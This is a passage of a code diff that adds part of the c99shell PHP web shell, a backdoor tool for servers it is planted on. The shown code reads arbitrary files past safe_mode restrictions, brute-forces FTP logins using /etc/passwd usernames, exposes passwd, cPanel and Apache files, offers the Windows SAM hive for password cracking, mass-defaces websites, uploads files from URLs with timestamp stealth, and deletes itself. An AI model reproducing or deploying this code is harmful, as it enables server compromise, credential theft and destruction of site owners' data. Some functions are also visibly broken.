+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    $set = array();
+    $set["sock"] = $sql_sock;
+    $set["db"] = $sql_db;
+    $dump_out = "print";               
+    if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
+    elseif ($dump_out == "download")
+    {
+     @ob_clean();
+     header("Content-type: c99shell");
+     header("Content-disposition: attachment; filename=\"".$f."\";"); 
+     $set["print"] = 1;
+     $set["nl2br"] = 1;
+    }
+    $set["file"] = $dump_file;
+    $set["add_drop"] = true;
+    $ret = mysql_dump($set);
+    if ($dump_out == "download") {exit;}
+   }
+   else
+   {
+    $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); 
+    echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
+    echo "<tr>";
+    echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
+    echo "<td><center><b>Table</b></center></td>";
+    echo "<td><b>Rows</b></td>";
+    echo "<td><b>Type</b></td>";
+    echo "<td><b>Created</b></td>";
+    echo "<td><b>Modified</b></td>";
+    echo "<td><b>Size</b></td>";
+    echo "<td><b>Action</b></td>";
+    echo "</tr>";
+    $i = 0;
+    $tsize = $trows = 0;
+    while ($row = mysql_fetch_array($result, MYSQL_NUM))
+    {
+     $tsize += $row["5"];
+     $trows += $row["5"];
+     $size = view_size($row["5"]);
+     echo "<tr>";
+     echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
+     echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
+     echo "<td>".$row[3]."</td>";
+     echo "<td>".$row[1]."</td>";
+     echo "<td>".$row[10]."</td>";
+     echo "<td>".$row[11]."</td>";
+     echo "<td>".$size."</td>";
+     echo "<td>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
+<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
+</td>";
+     echo "</tr>";
+     $i++;
+    }
+    echo "<tr bgcolor=\"000000\">";
+    echo "<td><center><b>�</b></center></td>";
+    echo "<td><center><b>".$i." table(s)</b></center></td>";
+    echo "<td><b>".$trows."</b></td>";
+    echo "<td>".$row[1]."</td>";
+    echo "<td>".$row[10]."</td>";
+    echo "<td>".$row[11]."</td>";
+    echo "<td><b>".view_size($tsize)."</b></td>";
+    echo "<td></td>";
+    echo "</tr>";
+    echo "</table><hr size=\"1\" noshade><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
+<option>With selected:</option>
+<option value=\"drop\" >Drop</option>
+<option value=\"empty\" >Empty</option>
+<option value=\"chk\">Check table</option>
+<option value=\"Optimize table\">Optimize table</option>
+<option value=\"Repair table\">Repair table</option>
+<option value=\"Analyze table\">Analyze table</option>
+</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
+    mysql_free_result($result);
+   }
+  }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstat","servervars","processes","getfile");
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+   }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    elseif (($sql_act == "getfile"))
+    {
+     if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
+     elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
+     elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
+     else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
+     else
+     {
+      for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+      $f = ""; 
+      while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
+      if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
+      else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
+     }
+     mysql_free_result($result);
+     if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
+     }
+    }
+   }
+  }
+ }
+ echo "</tr></table></table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
+ echo "<br><br>";
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if ($win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  $fp = fopen("/etc/passwd","r");
+  if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+  else
+  {
+   ob_flush();
+   $i = $success = 0;
+   $ftpquick_st = getmicrotime();
+   while(!feof($fp))
+   { 
+    $str = explode(":",fgets($fp,2048));
+    $sock = ftp_connect("localhost",21,1);
+    if (ftp_login($sock,$str[0],$str[0]))
+    {
+     echo "<a href=\"ftp://".$str[0].":".$str[0]."@".$SERVER_NAME."\" target=\"_blank\"><b>Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\"</b></a>.<br>";
+     ob_flush();
+     $success++;
+    }
+    if ($i > $nixpwdperpage) {break;}
+    $i++;
+   }
+   if ($success == 0) {echo "No success. connections!";}
+   $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+   echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
+  }
+ }
+}
+if ($act == "lsa")
+{
+ echo "<center><b>Server security information:</b></center>";
+ echo "<b>Software:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
+ echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
+ echo "<b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "<b>*nix /etc/passwd:</b><br>";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."<br>";}
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+.</font></b><br>";}
+ }
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else
+ {
+  echo "<b>File-System buffer</b><br><br>";
+  $ls_arr = $arr;
+  $disp_fullpath = true;
+  $act = "ls";
+ }
+}
+if ($act == "selfremove")
+{
+ if (!empty($submit))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  $v = array();
+  for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$surl."\"><u><b>NO</b></u></a>";}
+  $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$surl."act=selfremove&submit=1';\"><u>YES</u></a>";
+  shuffle($v);
+  $v = join("&nbsp;&nbsp;&nbsp;",$v);
+  echo "<b>Self-remove: ".__FILE__." <br>Are you sure?</b><center>".$v."</center>";
+ }
+}
+if ($act == "massdeface")
+{
+ if (empty($deface_in)) {$deface_in = $d;}
+ if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
+ if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+
+  $text = $deface_text;
+  $text_regexp = $deface_text_regexp;
+  if (empty($text)) {$text = " "; $text_regexp = 1;}
+
+  $a = array
+  (
+   "name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
+   "text"=>$text, "text_regexp"=>$text_regxp,
+   "text_wwo"=>$deface_text_wwo,
+   "text_cs"=>$deface_text_cs,
+   "text_not"=>$deface_text_not
+  );
+  $defacetime = getmicrotime();
+  $in = array_unique(explode(";",$deface_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $defacetime = round(getmicrotime()-$defacetime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $disp_fullpath = true;
+   $act = $dspact = "ls";
+   if (!$deface_preview) {$actselect = "deface"; $actbox[] = $found; $notls = true;}
+   else {$ls_arr = $found;}
+  }
+ }
+ else
+ {
+  if (empty($deface_preview)) {$deface_preview = 1;}
+  if (empty($deface_html)) {$deface_html = "</div></table><br>Mass-defaced with c99shell v. ".$shver.", coded by tristram[<a href=\"http://ccteam.ru\">CCTeaM</a>].</b>";}
+ }
+ echo "<form method=\"POST\">";
+ if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
+ echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
+<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
+<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
+<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
+<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
+}
+if ($act == "search")
+{
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v)
+  {
+   c99fsearch($v);
+  }
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = true;
+   $act = $dspact = "ls";
+  }
+ }
+ echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\","/",$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile[tmp_name]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile[name];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=\"POST\">
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=\"submit\" name=\"submit\" value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  if (empty($v)) {}
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ }
+}
+if ($act == "deface")
+{
+ $deferr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  if (empty($v)) {}
+  $result = fopen();
+  if (!$result) {$deferr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$deferr;}
+ }
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";}
+ 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  
+  if ($ext == ".tar.gz")
+  {
+   $cmdline = "tar cfzv";
+  }
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\","/",$v);
+   if (is_dir($v))
+   {
+    if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $ret = `$cmdline`;
+  if (empty($ret)) {$arcerr .= "Can't call archivator!<br>";}
+  $ret = str_replace("\r\n","\n");
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+ }
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while ($o = readdir($h)) {$list[] = $d.$o;}
+   closedir($h);
+  }
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open directory (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $tab = array();
+  $amount = count($ld)+count($lf);
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   
+   $k = $sort[0];
+   if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
+   if ($sort[1] == "a")
+   {
+    $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
+   }
+   else
+   {
+    $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>";
+   }
+   
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i."a\">".$row[$i]."</a>";}
+   }
+   
+   $tab = array();
+   $tab[cols] = array($row);
+   $tab[head] = array();
+   $tab[dirs] = array();
+   $tab[links] = array();
+   $tab[files] = array();
+
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $dir = dirname($v);
+     
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+  
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+
+    $row = array();
+
+    if ($o == ".")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
+     else {$type = "DIR";}
+     $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     $row[] = $type;
+    }
